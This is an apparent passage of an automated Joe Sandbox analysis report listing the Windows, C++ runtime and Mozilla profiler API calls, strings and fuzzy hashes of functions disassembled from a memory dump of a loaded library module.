                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACB8D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACBA4
                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACBC4
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACBE9
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C0ACBFB
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACC20
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C0ACC65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2325513730-2178588373
                                                                  • Opcode ID: 41b95e09da0f91ccb081fb9afc40b507e987e3ce9fb8682fec32d304dca77b0f
                                                                  • Instruction ID: 379d2a4146d4656a093b9cf52be53843a473e6ba1d3de988058590b95ac56545
                                                                  • Opcode Fuzzy Hash: 41b95e09da0f91ccb081fb9afc40b507e987e3ce9fb8682fec32d304dca77b0f
                                                                  • Instruction Fuzzy Hash: 8E416D707002089FCF00EFA5C888BAD77F5AB89718F154068E91A9B752EF36E905CB91
                                                                  APIs
                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5D32
                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5D62
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5D6D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5D84
                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5DA4
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5DC9
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C0B5DDB
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5E00
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C0B5C8C,?,6C08E829), ref: 6C0B5E45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2325513730-2178588373
                                                                  • Opcode ID: d571c24eb0093d2aa7f422abe99cfeba8dfc387bacabaff799591a7127ca27db
                                                                  • Instruction ID: 124dced1be0558d0bfa40b853bf7cd1d168bb898cc2967c403e58acd9debecea
                                                                  • Opcode Fuzzy Hash: d571c24eb0093d2aa7f422abe99cfeba8dfc387bacabaff799591a7127ca27db
                                                                  • Instruction Fuzzy Hash: 07417D347002048FDF10DFA5C898BAE77F6AF89718F1441A8E906AB791EF31E905CB61
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6A68
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C0B6A7D
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C0B6AA1
                                                                  • EnterCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6AAE
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0B6AE1
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0B6B15
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C0B6B65
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF618,?,?), ref: 6C0B6B83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
                                                                  • String ID: SymInitialize$3JT/
                                                                  • API String ID: 3103739362-2544457986
                                                                  • Opcode ID: 04d8db71e384bfcd5e3f0dcfae4d05b6e0a26b0cc2c39da7eb3fbee19b81d7e5
                                                                  • Instruction ID: b6d01ea76bb16cb58ddbf09a8cd44a3c38ca24fb5c3ca6ed873e46c7b93ff9bd
                                                                  • Opcode Fuzzy Hash: 04d8db71e384bfcd5e3f0dcfae4d05b6e0a26b0cc2c39da7eb3fbee19b81d7e5
                                                                  • Instruction Fuzzy Hash: 32419F71605344AFDB00DF74C888B9A7BF8AF46304F088479FD49DB682DB71A548CBA1
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C069675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C069697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0696E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C069707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C069773
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0697B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C0697D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C0697EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C069824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll$3JT/
                                                                  • API String ID: 409848716-1673298729
                                                                  • Opcode ID: 4280987de4a7c4ac325720bc8a91373ee91da90b50c53377a2cd3da9543d34cf
                                                                  • Instruction ID: 632959c461227ff36b58e73983c9cce5c8a4f9430781e8e2f50b2759892e10b0
                                                                  • Opcode Fuzzy Hash: 4280987de4a7c4ac325720bc8a91373ee91da90b50c53377a2cd3da9543d34cf
                                                                  • Instruction Fuzzy Hash: 31416F756003069BDF00CFA5D884BD677F8EB49768F118529ED1997F80DB30BA04CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EBA4
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C09EBAC
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EBC1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000), ref: 6C09EBCE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C09EBE5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8,00000000), ref: 6C09EC37
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C09EC46
                                                                  • CloseHandle.KERNEL32(?), ref: 6C09EC55
                                                                  • free.MOZGLUE(00000000), ref: 6C09EC5C
                                                                  Strings
                                                                  • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C09EA9B
                                                                  • 3JT/, xrefs: 6C09E8BE
                                                                  • [I %d/%d] profiler_start, xrefs: 6C09EBB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                  • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start$3JT/
                                                                  • API String ID: 4250961200-3585140985
                                                                  • Opcode ID: 23d592ff9e1fa4d1805427d6ca7733d4f81c6a30a434a077f7fe7a5bc279956c
                                                                  • Instruction ID: a5ff12a7edf9628c189aeeee5449b7eb25d1a4da1c9ef3aa774b7fda4a8cc1df
                                                                  • Opcode Fuzzy Hash: 23d592ff9e1fa4d1805427d6ca7733d4f81c6a30a434a077f7fe7a5bc279956c
                                                                  • Instruction Fuzzy Hash: 52116075A00614ABCF015F64D808B9A77F9FB46369F148224FD2997740DF31F8159BE2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$moz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3009372454-0
                                                                  • Opcode ID: 17bd87258f34ecc1fb28a8aef2ade8bc143743381479135f87667e29cfed5588
                                                                  • Instruction ID: cfe593af0b7e0f83cd1b29f1cc7b94c0b391cfe7011afcd60aaf3199136c2b45
                                                                  • Opcode Fuzzy Hash: 17bd87258f34ecc1fb28a8aef2ade8bc143743381479135f87667e29cfed5588
                                                                  • Instruction Fuzzy Hash: F3B10671A001109FDB188EBCCA907ED77E5AF45328F980628E416DBBC6D73099748B52
                                                                  APIs
                                                                  • free.MOZGLUE(?,6C0D008B), ref: 6C057B89
                                                                  • free.MOZGLUE(?,6C0D008B), ref: 6C057BAC
                                                                    • Part of subcall function 6C0578C0: free.MOZGLUE(?,6C0D008B), ref: 6C057BCF
                                                                  • free.MOZGLUE(?,6C0D008B), ref: 6C057BF2
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeavememset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3977402767-2178588373
                                                                  • Opcode ID: 2a0b38a64a7dbbfa0cf443232f51351114a2d2849b73c23a99362c9211aa3003
                                                                  • Instruction ID: 2b57f8d0fef0b4bfc4eed0ef5621b6e90a038da94b5d7de16be7ccce5f175dd8
                                                                  • Opcode Fuzzy Hash: 2a0b38a64a7dbbfa0cf443232f51351114a2d2849b73c23a99362c9211aa3003
                                                                  • Instruction Fuzzy Hash: 27C1C671D111288BEF288B2CCE90B9DB7F2AF41314F958398D41AA7BC1C731AE959F51
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09DBE1
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09DBE9
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C09DC5D
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C09DC7F
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                    • Part of subcall function 6C099A60: GetCurrentThreadId.KERNEL32 ref: 6C099A95
                                                                    • Part of subcall function 6C099A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C099A9D
                                                                    • Part of subcall function 6C099A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C099ACC
                                                                    • Part of subcall function 6C099A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C099BA7
                                                                    • Part of subcall function 6C099A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C099BB8
                                                                    • Part of subcall function 6C099A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C099BC9
                                                                    • Part of subcall function 6C09E8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C09DCF5), ref: 6C09E92D
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09DD1B
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09DD44
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09DD58
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
                                                                  • String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)$3JT/
                                                                  • API String ID: 3378208378-789149195
                                                                  • Opcode ID: 67f10e3f87629bbfe7e157a0a6174ec88eff2a11a84edb887c74de3aa603d00a
                                                                  • Instruction ID: 39c3690f47fbb596157e85b1270890c68144a809dfee182acac28280c901d281
                                                                  • Opcode Fuzzy Hash: 67f10e3f87629bbfe7e157a0a6174ec88eff2a11a84edb887c74de3aa603d00a
                                                                  • Instruction Fuzzy Hash: B7819D746017048FCB24DF69C884BAAB7F5AF89308F54892DD85A87F91DB30F949CB91
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A124B
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0A1268
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A12DA
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C0A134A
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C0A138A
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C0A1431
                                                                    • Part of subcall function 6C098AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0B1563), ref: 6C098BD5
                                                                  • free.MOZGLUE(?), ref: 6C0A145A
                                                                  • free.MOZGLUE(?), ref: 6C0A146C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2803333873-2178588373
                                                                  • Opcode ID: 0aeb2965629552e717d7f263f641fa3394a33ce0e7f202bedfb57d9aeed43044
                                                                  • Instruction ID: 1eb4994914dcd53e6fe49e9fa8061eab83dfa25e0e42864ec14a578aaa59f3fb
                                                                  • Opcode Fuzzy Hash: 0aeb2965629552e717d7f263f641fa3394a33ce0e7f202bedfb57d9aeed43044
                                                                  • Instruction Fuzzy Hash: BE61AE75A04344DBDB10CFA5C88079AB7F5BFC5308F04891DE99957612EB31F85ACB52
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A0F6B
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0A0F88
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A0FF7
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C0A1067
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C0A10A7
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C0A114B
                                                                    • Part of subcall function 6C098AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C0B1563), ref: 6C098BD5
                                                                  • free.MOZGLUE(?), ref: 6C0A1174
                                                                  • free.MOZGLUE(?), ref: 6C0A1186
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2803333873-2178588373
                                                                  • Opcode ID: 3a6cb21863f7daecb9503fe832a5b35f0bf62f9271a718e5519e1b734a60c31d
                                                                  • Instruction ID: 902ccf13277d2729bd65bf1a5300ad884a713bfd681f933ab049c6fea1f382fc
                                                                  • Opcode Fuzzy Hash: 3a6cb21863f7daecb9503fe832a5b35f0bf62f9271a718e5519e1b734a60c31d
                                                                  • Instruction Fuzzy Hash: 8161BF75A043449BDB10CFA5C880B9AB7F5BFC5308F04891DE99957712EB31F54ACB82
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0AD36B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD38A
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD39D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD3E1
                                                                  • free.MOZGLUE ref: 6C0AD408
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD44B
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD457
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6C0AD472
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
